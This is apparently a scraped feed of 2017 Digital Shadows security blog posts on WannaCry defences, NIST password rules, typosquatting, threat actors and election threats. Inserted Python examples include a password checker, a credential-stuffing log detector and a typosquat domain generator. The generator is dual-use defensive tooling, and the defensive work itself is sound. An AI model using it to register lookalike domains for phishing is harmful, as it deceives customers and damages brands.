    It is entirely possible that new information will come to light in future that further supports, or even discredits, some of the hypotheses proposed in this exercise. While attribution may be exciting and fulfill our insatiable desire to put a face to the crime, perhaps what is more important in this instance is reviewing what lessons we can learn from the WannaCry campaign. For this we advise checking out the recent blog from the Digital Shadows Security Engineering Team, which outlines five fundamental and widely used security principles that are reusable across different types of attackers, be it nation-state or petty cybercriminal.

    Digital Shadows’ 6th Anniversary Tue, 16 May 2017 23:33:30 +0000 It’s amazing to think that the idea James and I began working on from a kitchen table in London in May 2011 has now become the global cyber security company, Digital Shadows. The last 6 years have at times felt like a blur. We both feel privileged to have been on a journey full of challenges, excitement, ups and downs and remarkable progress for the firm.


    Rewinding to 2011 and our original inspiration for Digital Shadows, we recognized that the world was changing dramatically as companies adopted the cloud, social media and mobile devices for huge business benefits. From a security perspective, it was no longer going to be enough to focus solely on the network and the perimeter when much of the relevant, sensitive data was now being held outside the confines of the corporate boundary and faced new threats. We could see a range of new digital risks including data loss, brand and reputational damage, and cyber threats amongst many others, and no solution in sight.

    Classic startup/VC wisdom is to focus on a single area and be the best at that, which could have led us to focus on one of the risks/consequences of the boundaries disappearing around companies. Instead, in working very closely with our early clients we realized that part of our strength was in the breadth of the issues and data sources we covered: Third party risk, customer data leakage, fake and misleading social media profiles, code and credential compromise amongst many other issues – they were all important. So, we eschewed the traditional advice and set out to build a comprehensive solution to managing digital risks beyond the boundary. While there is always more to do and we are constantly improving, we are proud to now protect over 100 leading companies in 14 countries worldwide and to be scaling faster than ever before.


    The last 12 months have been particularly exciting for the company. We’ve opened new offices in London, Dallas and San Francisco as our employee count has doubled to over 130. Amongst them are key members of the leadership team like Daniel Moskowitz as CFO, Alex Seton as VP Business & Corporate Development and most recently, Dan Lowden as CMO. Our revenues have grown faster than ever, with 2016 marking our 3rd consecutive year of triple-digit growth. It’s been a pleasure to see how diverse the market is for Digital Shadows, with clients in a huge range of industries and new geographies such as the Middle East and Asia Pac to join our home markets of the USA and Europe. We hear from our clients that the three main aspects of our service are:

    • The ‘human in the loop’: We provide a full service including analysts on our side that apply specialist expertise and verify incidents before they are sent to our clients, eliminating false positives and work for our clients. Most companies that we have encountered prefer this approach over having to hire more employees to do this on their behalf, having to procure and use a set of tools, sifting through false positives and using yet more portals. There is a high total cost of ownership in this hard-to-hire market.
    • Broad coverage: The coverage we provide is broader than anything else available.  Most companies don’t want to build their own solutions or try to integrate 4 or 5 point products, so knowing that we have the widest coverage of data sources in scope is a key priority, especially when many know we are trusted by global banks, stock exchanges and critical national infrastructure.
    • The relevance of what we provide: We strive to only tell our clients the things they care about and can do something about. Uniquely, our analysts provide our clients with a recommended mitigation for every client incident we send them.

    Our customers are everything to us, and so James and I do our best to check in with as many as we can to get their feedback. Alongside our product team, we do our best to really understand the problems our clients face so that we can continue to innovate in the right direction. Our recent new UI launch and leading mobile app store coverage resulted from some of that feedback. We have more exciting new announcements in this regard over the coming months.

    Finally, we are proud of the exceptional team we have assembled and the culture they have created. That’s what makes the company what it is. For several years we have codified our culture into a set of values defined by the team themselves that we have used to inform decision making and hiring. These values are enclosed below.


    Thank you for reading this far. To our clients, thank you for all your support and feedback over the years for which we are extremely grateful. To our employees – James and I look forward to our anniversary celebrations later today and we will be raising a glass to all of you – happy birthday!

    Digital Shadows: Our Values

    Do the Right Thing

    We are an ethical company operating with respect, empathy and equality. We respect everyone’s security, freedom and privacy.

    Anything is Possible

    We encourage innovation, independent thinking and team work.

    Trust and be Trusted

    We trust our people to make the right decisions and assume best intentions. We deal in facts, not fear.

    All about the People

    We have a diverse, inclusive, fun and spirited culture that nurtures exceptional talent for the long haul. We make the world safe for our clients and our community.

    5 Lessons from WannaCry: Preventing Attacks with Security Engineering Tue, 16 May 2017 19:18:12 +0000 With the recent news storm concerning the “WannaCry” ransomware worm, a great deal of mitigation advice has been provided. This advice typically centers around patching, in particular installing MS17-010 from Microsoft (or the KB from Microsoft for XP/2k3), which patches the vulnerability exploited by the ETERNALBLUE exploit used by WannaCry.

    WannaCry Note

    Much has been made about the (in)ability for certain organizations to patch, but we felt it would be worthwhile revisiting our favorite Security Engineering principles and seeing how they can be used to protect against WannaCry. While the focus of this blog will be on protection, I’ll be writing another blog post on detection.

    Here are five fundamental and widely used Security Engineering principles, which are all reusable across different types of attackers:

    1. Default deny

    This principle can be expressed as “only provide access where it has been explicitly granted, otherwise deny”. This is a useful principle to apply to firewalling and other techniques for managing traffic flow such as IP whitelisting. By denying SMB traffic (TCP port 445) at the organization’s perimeter, WannaCry’s spreading technique is prevented. Often this principle is not strictly applied to internal systems.

    WannaCry was typically able to move laterally within an organization as endpoints (user workstations) were able to communicate with each other. While this may be required in specific situations, the general case is that an endpoint only needs to communicate with specific servers (such as the Domain Controller, networking equipment, fileservers, etc.) but not with other workstations. Appropriately configured host-based firewalls would prevent WannaCry being able to move laterally.

    2. Least Privilege

    Jerome Saltzer formulated this principle as: “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”. This principle is typically applied to defeating privilege escalation exploitation; however, we find it to be a natural complement to the first principle. An appropriately segmented network provides only the privilege necessary for the hosts to do their work. If workstations do not need access to other networks, especially operational or production networks, then this privilege should not be granted.

    This approach would prevent WannaCry from spreading beyond the network segment it gained access to. This principle also applies to documents: do all systems need read and write access to important data, or only read access? By limiting such privileges, the ability of WannaCry to encrypt/”lock” files is reduced.

    3. (Attack) Surface Reduction

    Any feature of a piece of software that is enabled increases the attack surface of that software. There is simply more for an attacker to target. In the case of WannaCry, it is reliant on SMB v1 being enabled on a host. SMB v1 is a legacy protocol, and Microsoft strongly recommends disabling it unless it is explicitly required.

    By going through the process of discovering which protocols or features are explicitly required for a system to function and disabling all other, unnecessary features, a system is hardened against attack. The ETERNALBLUE exploit will fail if SMB v1 is not enabled, rendering the worm unable to gain a foothold. Another excellent way to reduce the attack surface of a piece of software is to apply vendor patches which resolve security vulnerabilities. Patching Windows prevents ETERNALBLUE from being able to successfully exploit a host.

    4. Need to Know/Compartmentalization

    Need to know is typically used to describe data classification systems, but it has utility beyond those systems as a general approach to configuring systems. In the case of WannaCry, important data can be safeguarded by only granting access to those who have a business requirement to access that data, that is, a need to know. This reduces the number of systems that have access to important data and therefore makes defenders’ lives easier, as they have fewer systems to be directly concerned about. If important data can be accessed by many systems, any one system that is compromised by WannaCry would be able to encrypt the data.

    5. Defense in Depth

    This principle is an overarching one that encompasses the four others. In essence, it states that not one single control is sufficient to adequately protect a system. Controls can be physical (like door locks), technical (like encryption) or administrative (like security policies). By using the four above principles together, we can derive a defense-in-depth strategy for protecting against WannaCry that is reusable against other attacks too:

    • Firewall off SMB traffic both in-bound and out-bound from an organization’s network (#1)
    • Aggressively filter BYOD devices or assets with missing (security) patches from accessing resources in the network (#1)
    • Restrict workstation-to-workstation communication to only that which is necessary (#2)
    • Segment networks so that compromise of one endpoint does not automatically give access to the entire network (#2)
    • Disable unneeded legacy features which are liable to be exploited (#3)
    • Apply vendor patches in a timely fashion, as part of a continuous vulnerability assessment program, to reduce the number of exploitable vulnerabilities in installed software (#3)
    • Restrict access to important data to only those who are required to have it. Read/write access should only be granted where there is an explicit business requirement (#4)

    Defense-in-depth would also indicate that we should be prepared if our other controls fail so it would be natural to add a final guideline:

    • Backup important data to guard against critical loss and failure of other controls (#5)

    These five fundamental steps can help organizations to better prevent attacks like the WannaCry. Prevention is only one step, so stay tuned for our upcoming blog with advice on improving detection.

    WannaCry: The Early 2000s Called, They Want Their Worms Back Fri, 12 May 2017 22:56:10 +0000 Earlier today it was revealed that the United Kingdom’s National Health Service was targeted by ransomware known as “WannaCry.” Sixteen NHS organizations were impacted by the attack, and victims have spread across the globe and will likely continue to do so. WannaCry takes advantage of SMB vulnerabilities in Windows, using the ETERNALBLUE exploit which was publicly released by the ShadowBrokers in April. This SMB vulnerability is “wormable” and reminiscent of the early 2000s worms like Code Red, Nimda and Blaster. Microsoft released MS17-010 to address this SMB vulnerability on March 14th prior to the ShadowBrokers dump.


    Just over eight weeks later, we are seeing the initial implications of not deploying this SMB patch, and this is an area that I’d like to focus on. If you have been on the Twitters today, it is as if a million voices have suddenly cried out in terror tweeting “Why didn’t you just patch it!” This seems like a reasonable question, but reality isn’t always reasonable. Having been an industry analyst, I’m naturally familiar with ivory towers and questions like this can indicate that someone might be a bit disconnected from the realities of day to day security operations. There are legitimate reasons why not every endpoint on the planet is running MS17-010.

    • Patching ain’t easy; managing a global patch/systems/configuration management program is complex.
    • Devices and users are transient.
    • Environments are very heterogeneous. How many organizations have a single workstation build? It’s more like you have many gold images.
    • It simply isn’t possible to patch all the things: medical equipment, research gear, ICS devices, you know the drill.

    Am I making excuses for organizations that didn’t apply MS17-010? No I am not, but it is important to remember that security isn’t black and white, operations are hard, and sometimes thoughtful risk management might still result in a loss. Back to WannaCry, here are some recommendations from our intelligence team on mitigations:

    • Apply MS17-010 if you can
    • In the event you can’t:
      • Restrict access on TCP and UDP ports 138, 139 and 445 to the host.
      • Disable SMBv1
      • Disable RDP (TCP/UDP port 3389) access from the Internet. (I really hope you don’t have public facing RDP exposed).
      • If that is also not possible, restrict access either via a VPN or IP access control lists.

    Two final recommendations, if you don’t already have a ransomware response playbook, hopefully today isn’t the test run. You should also formalize your ransomware minimization strategy; you might not be able to prevent it all, but it doesn’t mean you shouldn’t try. Our intelligence team will continue to monitor the situation and update our clients as needed.

    Authentication Nation: 5 Ways NIST is Changing How We Think About Passwords Tue, 09 May 2017 16:47:16 +0000 Passwords have taken a beating over the past several years, and there seems to be little question among leading practitioners that the antiquated method of authentication needs a hefty remodel. To give an idea of scale, we assessed the biggest 1,000 organizations in the world and found that, across over 30,000 different breaches, 97% of these organizations had leaked corporate emails online. This should serve as a cautionary tale for all organizations to carefully examine their own password management practices. Following Microsoft’s updated password recommendations, the US National Institute of Standards and Technology (NIST) has recently come out with its own updated password guidelines.

    NIST Password Guidelines

    When two major security industry influencers come to such similar conclusions, it’s a strong signal that companies should take a hard look at their password policies – both for their internal systems and their externally-facing services that have an identity store.

    Many of the NIST guidelines are recommendations only, but a number of them are requirements that all federal government agencies must follow. That’s a broad reach of influence – but it’s even wider than that, because many corporate security professionals use them as base standards and best practices when forming policies for their companies in the private sector. Here is a quick overview of the main changes NIST has proposed:

    1. Minimum password length of 8 characters, with a maximum of no less than 64. The focus here is to fortify the system so it can manage the storage of these longer and more complex passwords; the burden therefore lies with the verifier, easing password fatigue for users and simplifying processes.
    2. All ASCII and UNICODE characters should be allowed. Remembering a password longer than eight characters is not necessarily easy, but NIST’s new guidelines allow the use of all printable ASCII characters, as well as all UNICODE characters (including emojis!) to improve usability and increase variety.
    3. Remove knowledge-based authentication and no more password hints. NIST is rejecting knowledge-based authentication (KBA) that can be discovered, or brute forced, by an attacker. In other words, the typical “first pet” or “mother’s maiden name” password prompt is a thing of the past.
    4. Stop practice of regular password expiration. If we want users to comply and choose long, hard-to-guess passwords, we shouldn’t make them change those passwords unnecessarily. The only time passwords should be reset is when they are forgotten, if they have been phished, or if you think (or know) that your password database has been stolen and could therefore be subjected to an offline brute-force attack.
    5. Check against a list of “known-bad” passwords. NIST’s experts say a mix of character types in passwords (such as at least one digit, uppercase letter and symbol) “is not nearly as significant as initially thought, although the impact on usability and memorability is severe.” Instead, NIST recommends that user-chosen passwords be compared against a list of unacceptable passwords. That list should include passwords from previous breaches, dictionary words and specific words (such as the name of the service itself) that users are likely to choose.
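    Points 1, 2 and 5 above translate directly into a verifier-side acceptance check. The following is an added example written for this post (not NIST’s reference code and not a Digital Shadows product): it enforces only the length bounds and a blocklist, allows any Unicode, applies no composition rules, and checks the candidate against a breach corpus using the hash-prefix lookup shape of Troy Hunt’s Pwned Passwords range API (first five hex characters of the SHA-1 are sent, the matching suffixes come back as SUFFIX:COUNT lines). Everything here runs offline: the service name, blocklist and breach corpus are constructed for the illustration, and the range lookup is a local stand-in you would replace with the real HTTP call.

```python
"""Password acceptance check following the NIST SP 800-63B points summarised above."""
import hashlib
import unicodedata

MIN_LEN = 8
MAX_LEN = 64        # the verifier must accept at least 64 characters; longer is fine

# Constructed known-bad list: breach-derived strings, dictionary words and service-specific terms.
SERVICE_NAME = "examplecorp"   # placeholder service name
BLOCKLIST = {"password", "123456789", "qwertyuiop", "letmein1", SERVICE_NAME}


def normalize(pw):
    """NFKC-normalise so the same visible password always hashes the same way."""
    return unicodedata.normalize("NFKC", pw)


def sha1_prefix_suffix(pw):
    """Split the uppercase hex SHA-1 into the 5-char prefix sent and the suffix compared locally."""
    digest = hashlib.sha1(normalize(pw).encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def build_ranges(breached_passwords):
    """Index a constructed breach corpus as prefix -> ["SUFFIX:COUNT", ...], the range-API shape."""
    ranges = {}
    for pw in breached_passwords:
        prefix, suffix = sha1_prefix_suffix(pw)
        ranges.setdefault(prefix, []).append(f"{suffix}:3")   # constructed breach count
    return ranges


# Constructed breach corpus standing in for the real Pwned Passwords data set.
LOCAL_RANGES = build_ranges(["hunter2hunter2", "Welcome2017", "correcthorsebatterystaple"])


def local_range_lookup(prefix):
    """Offline stand-in for GET /range/{prefix}; returns the SUFFIX:COUNT lines for that prefix."""
    return LOCAL_RANGES.get(prefix, [])


def check_password(pw, service_name=SERVICE_NAME, blocklist=BLOCKLIST, range_lookup=None):
    """Return (accepted, reason). Length bounds and known-bad lists only: no composition rules."""
    pw = normalize(pw)
    n = len(pw)                     # counts code points, so emoji and other Unicode count as characters
    if n < MIN_LEN:
        return False, "too short"
    if n > MAX_LEN:
        return False, "too long"
    lowered = pw.casefold()
    if lowered in blocklist or service_name.casefold() in lowered:
        return False, "on known-bad list"
    if range_lookup is not None:
        prefix, suffix = sha1_prefix_suffix(pw)
        for line in range_lookup(prefix):
            hit, _, count = line.partition(":")
            if hit == suffix and int(count) > 0:
                return False, "seen in breaches"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ["short7", "Password", "hunter2hunter2", "🔒 my cat is 🐈 fluffy"]:
        print(repr(candidate), check_password(candidate, range_lookup=local_range_lookup))
```

    Note what is deliberately absent: there is no rule demanding a digit or a symbol, no hint field and no expiry timer, so the only reasons a long, unique passphrase can be refused are the ones NIST actually endorses. Sending only the five-character prefix means the lookup service never learns the candidate password or even its full hash.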

    Many enterprises and online services are looking to replace the much-scorned password. Several financial services companies, for example, are rolling out biometric authentication options for their customers, as well as a range of two-factor authentication options. However, there is still no universally accepted alternative to the password. So, despite its weaknesses, both in terms of security and practical use, many systems rely on it; and since passwords are here to stay for a while longer, it is refreshing to see NIST research into making password authentication more robust and more user-friendly.

    Although the NIST Digital Authentication Guideline governs federal sites, its tenets are good standards for any site or system with authentication requirements. Overall, the new guidelines put the user experience at the forefront while placing clear obligations on the verifier, where the storage and checking of secrets can be hardened centrally. Credentials are incredibly valuable to attackers, who use them for a range of activities, including post-breach extortion, phishing and account takeovers. As organizations begin to better understand the implications of breaches, NIST is a great resource for guidance on passwords.

    The 3 Pillars of Digital Risk Management: Part 3 – The Top 5 Main Risks of Reputational Damage Thu, 27 Apr 2017 17:40:46 +0000 In this 3-part blog series, we discuss how each of the 3 pillars, Cyber Threat, Data Leakage, and Reputational Damage, contributes to Digital Risk Management. In part 2, we discussed the 6 main areas that contribute to data leakage risks. In this next and final blog in the series, we discuss the main risks of reputational damage.

    It is easy for organizations to be unaware of how their brands are being used online and what impact this can have on customers and employees. Here are the top 5 main risks of reputational damage.

    1. Phishing

    Phishing campaigns are conducted against organizations. Using digital risk management to identify these campaigns raises security awareness and mitigates their impact.

    2. Domain Infringement

    Typosquat domains are registered to spoof your websites and hijack your brand. By monitoring for typosquatted domains, organizations can protect their reputation and minimize the implications of domain infringements.


    Figure 1: A view of typosquatting domains identified for a fictional organization
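Monitoring for typosquats starts with knowing which lookalike names to watch. The block below is an added example, not the monitoring used by Digital Shadows, that generates the common typosquat classes (character omission, transposition, repetition, keyboard-neighbour substitution, homoglyphs such as "rn" for "m", hyphenation and TLD swaps) for a brand domain. The brand name molnnet (the fictional organization in Figure 1) and the TLD list are placeholders; the output is the watch list you would then resolve against DNS, WHOIS or certificate-transparency logs.

```python
"""Typosquat candidate generation for a brand domain.  Added example, not the
post's own tooling; 'molnnet.com' and the TLD list are placeholders.  Handles
'name.tld' only; multi-label suffixes such as .co.uk would need a suffix list."""

# QWERTY adjacency for fat-finger substitutions (letters only, enough to demonstrate)
KEYBOARD_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr", "f": "drtgvc",
    "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn", "k": "jiolm", "l": "kop",
    "m": "njk", "n": "bhjm", "o": "iklp", "p": "ol", "q": "wa", "r": "edft", "s": "awedxz",
    "t": "rfgy", "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu", "z": "asx",
}
# Character sequences that look alike in common fonts
HOMOGLYPHS = {"m": ["rn"], "rn": ["m"], "l": ["1", "i"], "i": ["l", "1"],
              "o": ["0"], "d": ["cl"], "w": ["vv"], "vv": ["w"]}


def omissions(name):
    return {name[:i] + name[i + 1:] for i in range(len(name))}


def transpositions(name):
    return {name[:i] + name[i + 1] + name[i] + name[i + 2:]
            for i in range(len(name) - 1) if name[i] != name[i + 1]}


def repetitions(name):
    return {name[:i] + name[i] + name[i:] for i in range(len(name))}


def substitutions(name):
    return {name[:i] + k + name[i + 1:]
            for i, c in enumerate(name) for k in KEYBOARD_NEIGHBOURS.get(c, "")}


def homoglyphs(name):
    out = set()
    for src, repls in HOMOGLYPHS.items():
        idx = name.find(src)
        while idx != -1:
            out.update(name[:idx] + r + name[idx + len(src):] for r in repls)
            idx = name.find(src, idx + 1)
    return out


def hyphenations(name):
    return {name[:i] + "-" + name[i:] for i in range(1, len(name))}


def typosquat_candidates(domain, tlds=("com", "net", "org", "co", "cm", "info")):
    """Return a sorted list of lookalike domains for `domain` (e.g. 'brand.com')."""
    name, _, tld = domain.lower().rpartition(".")
    names = set()
    for gen in (omissions, transpositions, repetitions, substitutions, homoglyphs, hyphenations):
        names |= gen(name)
    names.discard(name)                                   # the genuine name is not a squat
    names = {n for n in names if n and n.strip("-") == n}  # DNS labels cannot start/end with '-'
    candidates = {f"{n}.{tld}" for n in names}
    candidates |= {f"{name}.{t}" for t in tlds if t != tld}  # TLD swap, e.g. .be -> .info
    return sorted(candidates)


if __name__ == "__main__":
    watch = typosquat_candidates("molnnet.com")
    print(len(watch), "candidates, e.g.", watch[:8])
```

The generators are deliberately independent so that a registration can be attributed to a class (a homoglyph hit is a stronger phishing signal than a plain TLD swap, which is often a legitimate defensive registration). Combining two classes, or adding IDN confusables, multiplies the list and is the usual next step.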

    3. Spoofed Profiles

    The social media accounts of key executives or brands can be spoofed. Unwary consumers might mistake these unsanctioned accounts as legitimate and get incorrect information or, worse, succumb to social engineering attacks.

    4. Brand Defamation

    Disgruntled former employees or dissatisfied customers can damage brands online. Swift detection of online brand defamation helps to keep customers happy and prevents damage occurring to the organization’s brand.


    Figure 2: A defamatory blog set up by a former company employee 

    5. Mobile Application Issues

    Spoofed or maliciously modified applications can leave customers and employees exposed. Organizations need to identify and remove these risky mobile applications to have confidence that their employees’ and customers’ information is protected.

    A failure to detect and remediate these reputational damage risks to customers and employees can have significant business impacts, including loss of revenue, regulatory costs and loss of customers.

    Thanks for reading along with this blog series on digital risk management. To learn more, check out our web page on Digital Risk Management.



    The Usual Suspects: Understanding the Nuances of Actors’ Motivations and Capabilities Fri, 21 Apr 2017 16:53:27 +0000 When it comes to their adversaries, organizations can still fall into the trap of focusing on the ‘usual suspects’. At times, the mainstream media’s coverage of threat actors can result in a highly polarized or stereotyped lens in which actors are unfortunately presented as either highly sophisticated, well-funded state actors; or far less sophisticated hackers who occasionally get a break, aka “400-pound hackers.”

    The reality is more nuanced, with actors exhibiting a range of different motivations, intents and capabilities, as well as technical skill sets and levels of operational sophistication, none of which are mutually exclusive. Some highly technical attackers using customized malware and achieving persistent access to networks have also made simple operational errors which provided valuable clues to investigators.

    Of course, as Rick Holland wrote in a previous blog, “adversaries do what works easily”. The 2013 Verizon DBIR put it best: “Would you fire a guided missile at an unlocked screen door?” It is not all about zero days; high-capability attackers have also leveraged commercial off-the-shelf tools and common malware to accomplish their mission.

    In a similar way, less technically capable threat actors can be highly successful using simple techniques. The threat actor group Team GhostShell showed evidence of this by using SQL injection to gain access to hundreds of public records of alumni from 53 universities across the world.

    Digital Shadows maintains a comprehensive intelligence database encompassing a wide range of threat actors and campaigns. Within each profile, motivations and intent of an actor are analyzed and assessed to create a rich understanding of the characteristics of an actor as well as the tactics they typically adopt.


    Figure 1 Digital Shadows Portal – Intelligence View

    This well-referenced and ready-made library of threat actor activity provides a resource clients can use to understand the latest threats or to provide detail for intelligence assessments. Clients are also presented with actor profiles most relevant to their organizations. The profiles can also be used as case studies for more strategic assessments looking at a range of actors or sector threats.

    For example, from the first identification of an attack, an organization can use the Intelligence tab of the Portal to begin piecing together the perpetrator, their TTPs, recent activity and credibility, in order to make an assessment of how to move forward. In addition, known indicators of compromise (IOCs) are included, allowing clients to recognize any intrusion attempts on their internal systems.


    Figure 2 Actor Profile

    This allows our clients to maintain an understanding of the complex assortment of threat actors out there, including an understanding of their capabilities and intent towards particular targets.  Organizations can then inform their security posture and help manage their risk to achieve business goals.  Finally, organizations can use these threat actor and campaign profiles to manage up the chain of command. SearchLight customers can leverage this robust library to quickly tell a story to their executive team and help them understand the actor’s implications to their business.

    To learn more about how Digital Shadows monitors threat actors, watch our full demo video here.

    Liberté, égalité, securité: 4 Threats to the French Presidential Election Thu, 20 Apr 2017 16:43:59 +0000 French citizens will take to the polls on April 23rd to vote for a new president. If, as expected, no candidate wins a majority, then a run-off election between the two top candidates will be held on May 7th. Since reports of network intrusions against political parties during the 2016 United States presidential election surfaced last year, it has become customary that any analysis of an upcoming western political election forewarns of the threat of foreign nation-state interference.

    In the French case, intelligence sources claimed in January that Kremlin-backed actors were conducting an influence campaign in favor of Marine Le Pen of the Front National, while discrediting her competitors, particularly the pro-EU and centrist candidate Emmanuel Macron. Macron’s camp have pointed to media reports from Russian news outlets as examples of “fake news”. They have also claimed to have been subjected to numerous cyberattacks against their campaign systems, though these remain unconfirmed.


    Figure 1: Sputnik article referred to by Macron camp as “fake news” [Source: Sputnik]

    Although we have yet to detect any confirmed examples of cyberattacks or influence operations associated with the French election, we can look back at activity seen during previous elections, particularly those in the United States and the Netherlands, as useful indicators of the type of activity we can expect.

    1. Network intrusions

    Actors may choose to target political parties or government organizations in similar ways to the reported network intrusions against the Democratic party in the United States. Moreover, large financial bodies may be targeted given their pivotal role in the French economy and, by extension, any future policy decisions by the French president, particularly in light of the uncertainty surrounding France’s membership in the European Union.

    Network intrusions would likely be conducted for intelligence-gathering purposes, potentially with a view to releasing sensitive information publicly as part of an influence operation designed to discredit a political candidate. Based on previous examples of network intrusions we have observed, social engineering and spear-phishing continue to be the most successful attack vectors, a trend assessed as highly unlikely to change for the foreseeable future.

    2. Public data leakage

    An ideologically motivated actor may attempt to release sensitive or confidential information citing freedom of information and the fulfilment of a public service. Obtaining information for the purposes of public data leakage can be achieved in a variety of ways, including phishing and social engineering attempts, network intrusions and data exfiltration, inadvertent exposure through public facing databases and applications, or even document theft from insiders.

    In Feb 2017, it was reported that WikiLeaks founder Julian Assange had claimed to be in possession of information that could potentially damage the election prospects of Emmanuel Macron. Assange claimed the information had been obtained from the cache of emails belonging to Hillary Clinton. It was not known whether WikiLeaks planned to release this information, though this was assessed as likely given Assange’s public overtures.

    3. Hacktivism

    Hacktivist actors are most often motivated by a desire for public attention, either for themselves or for the issues they claim to represent. Hacktivist attacks generally take the form of DoS attempts, website defacements and public data leaks achieved through techniques such as SQL injection. Other tactics include “tweet storms” (a method whereby tweets from multiple Twitter accounts sympathetic to an ideology are directed at certain targets, or attempt to start a trend on social media platforms) and other attempts to raise awareness of a cause on social media. At the time of writing we had not detected any hacktivist campaigns established specifically for the 2017 French elections.

    4. False media reporting

    The dissemination of false information might allow threat actors to influence public opinion or discredit a particular candidate. Such activity would likely occur across a wide variety of media including established online publications, spoof news sites, or through fake social media profiles on LinkedIn, Facebook and Twitter. The South American hacker Andrés Sepúlveda, for example, was reportedly responsible for a series of covert influence campaigns across elections in Latin America. Sepúlveda and his team purportedly managed thousands of fake profiles on social media to shape the discussion around political topics and even hack the cell phones and emails of candidates.

    On 02 Mar 2017, the Belgian newspaper Le Soir claimed it had been the victim of plagiarism after an impersonation of its website published an article alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. The false article claimed to be a dispatch from Agence France-Presse, appearing on the domain lesoir[.]info, a typo-squat of the legitimate lesoir[.]be.


    Figure 2: False Le Soir article retweeted by Marion Le Pen, member of Front National, official Twitter account [Source: CrossCheck]

    While it remains to be seen whether many of the above scenarios materialize, the threat of increased cyber activity during election periods is one that organizations with ties to government or political institutions will have to consider for the foreseeable future. Organizations can help protect themselves in several ways:

    1. For starters, adequate phishing training can help mitigate against cases of network intrusion and public data leaks, as social engineering and phishing attempts were assessed to be the most likely, though not the only, vectors of attack.
    2. Beyond that, properly secure public-facing applications, monitor for suspicious activity that may indicate an insider threat, identify fake or spoofed social media profiles, and track the emergence of hacktivist actors and dedicated campaigns.

    The 3 Pillars of Digital Risk Management: Part 2 – The 6 Main Areas That Contribute to Data Leakage Risks Tue, 18 Apr 2017 17:06:13 +0000 In this 3-part blog series, we discuss how each of the 3 pillars, Cyber Threat, Data Leakage, and Reputational Damage, contributes to Digital Risk Management. In part 1, we discussed how understanding cyber threats requires a threat intelligence capability and consists of 4 main areas. In this next blog, we discuss the main areas that contribute to data leakage risks.

    Leaked information can provide valuable clues for adversaries. Below are 6 main areas that contribute to data leakage risks.

    1. Sensitive Code

    Sensitive code and private encryption keys are published, usually inadvertently, on code-sharing sites. This can allow attackers to better tailor their attacks to an organization.

    2. Credential Compromise

    Employee credentials are exposed in third-party breaches. These credentials are then used by attackers for account takeovers, spam lists, credential stuffing, spear-phishing and post-breach extortion.


    Figure 1: A criminal forum discussing various configurations for SentryMBA, a credential stuffing tool
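Credential stuffing has a recognizable shape in authentication logs: a single source replays many different username/password pairs from a breach list in a short period, almost all of which fail. The following is an added example (not a Digital Shadows product) of detection logic over such logs; the log format and every sample line are constructed for the demonstration. It distinguishes stuffing (many distinct usernames per source) from single-account brute force and from a user mistyping their own password, and reports which accounts were successfully logged into inside the attack window, since those are the credentials that must be reset.

```python
"""Detection logic for credential-stuffing traffic in authentication logs: one
source tries many *different* usernames in a short window with a high failure
rate (a single account hammered repeatedly is brute force, a different pattern).
Added example, not a Digital Shadows product; the log format and the sample
lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) ip=(?P<ip>\S+) "
    r"user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)

# Constructed sample: 203.0.113.5 replays a breached list; 198.51.100.7 is a
# user mistyping their own password; 192.0.2.9 brute-forces one account.
SAMPLE_LOG = """\
2017-04-18T10:00:01Z ip=203.0.113.5 user=alice result=fail
2017-04-18T10:00:02Z ip=203.0.113.5 user=bob result=fail
2017-04-18T10:00:03Z ip=203.0.113.5 user=carol result=fail
2017-04-18T10:00:04Z ip=203.0.113.5 user=dave result=fail
2017-04-18T10:00:05Z ip=203.0.113.5 user=erin result=fail
2017-04-18T10:00:06Z ip=203.0.113.5 user=frank result=ok
2017-04-18T10:00:07Z ip=203.0.113.5 user=grace result=fail
2017-04-18T10:00:08Z ip=203.0.113.5 user=heidi result=fail
2017-04-18T10:01:00Z ip=198.51.100.7 user=alice result=fail
2017-04-18T10:01:20Z ip=198.51.100.7 user=alice result=fail
2017-04-18T10:01:40Z ip=198.51.100.7 user=alice result=ok
2017-04-18T10:02:00Z ip=192.0.2.9 user=carol result=fail
2017-04-18T10:02:01Z ip=192.0.2.9 user=carol result=fail
2017-04-18T10:02:02Z ip=192.0.2.9 user=carol result=fail
2017-04-18T10:02:03Z ip=192.0.2.9 user=carol result=fail
this line is malformed and is skipped
"""


def parse(log_text):
    """Parse log lines into dicts with a datetime timestamp; malformed lines are dropped."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5), min_users=5, min_fail_ratio=0.8):
    """Sliding window per source IP. Returns {ip: summary} for sources whose window
    contained at least `min_users` distinct usernames with a failure ratio of at
    least `min_fail_ratio`. Successful logins inside such a window are the accounts
    to force-reset, since the attacker now holds a working credential pair."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1                      # slide the window's left edge
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            fails = sum(e["result"] == "fail" for e in win)
            if len(users) >= min_users and fails / len(win) >= min_fail_ratio:
                alerts[ip] = {                  # later windows overwrite earlier ones
                    "distinct_users": len(users),
                    "attempts": len(win),
                    "fail_ratio": fails / len(win),
                    "compromised": sorted(e["user"] for e in win if e["result"] == "ok"),
                }
    return alerts


if __name__ == "__main__":
    for ip, summary in detect_credential_stuffing(parse(SAMPLE_LOG)).items():
        print(ip, summary)
```

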